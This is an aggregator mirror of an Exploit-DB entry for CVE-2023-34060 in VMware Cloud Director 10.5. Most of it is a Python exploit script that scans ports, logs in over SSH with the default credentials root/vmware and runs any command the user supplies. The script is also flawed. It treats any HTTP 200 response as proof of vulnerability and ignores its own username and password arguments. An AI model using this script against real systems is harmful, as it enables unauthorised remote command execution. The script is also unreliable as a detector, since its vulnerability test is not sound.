3
[remote] VMware Cloud Director 10.5 - Bypass identity verification
source link: https://www.exploit-db.com/exploits/51882
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
VMware Cloud Director 10.5 - Bypass identity verification
EDB-ID:
51882
EDB Verified:
# Exploit Title: [VMware Cloud Director | Bypass identity verification]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [10.5]
# CVE : [CVE-2023-34060]
import requests
import paramiko
import subprocess
import socket
import argparse
import threading
# Define a function to check if a port is open
def is_port_open(ip, port):
# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set the timeout to 1 second
s.settimeout(1)
# Try to connect to the port
try:
s.connect((ip, port))
# The port is open
return True
except:
# The port is closed
return False
finally:
# Close the socket
s.close()
# Define a function to exploit a vulnerable device
def exploit_device(ip, port, username, password, command):
# Create a ssh client object
client = paramiko.SSHClient()
# Set the policy to accept any host key
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Connect to the target using the credentials
client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)
# Execute the command and get the output
stdin, stdout, stderr = client.exec_command(command)
# Print the output
print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")
# Close the ssh connection
client.close()
# Parse the arguments from the user
parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")
parser.add_argument("ip", help="The target IP address")
parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")
parser.add_argument("-u", "--username", default="root", help="The username for ssh")
parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")
parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")
args = parser.parse_args()
# Loop through the ports and check for the vulnerability
for port in args.ports:
# Check if the port is open
if is_port_open(args.ip, port):
# The port is open, send a GET request to the port and check the status code
response = requests.get(f"http://{args.ip}:{port}")
if response.status_code == 200:
# The port is open and vulnerable
print(f"Port {port} is vulnerable to CVE-2023-34060")
# Create a thread to exploit the device
thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))
# Start the thread
thread.start()
else:
# The port is open but not vulnerable
print(f"Port {port} is not vulnerable to CVE-2023-34060")
else:
# The port is closed
print(f"Port {port} is closed")
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK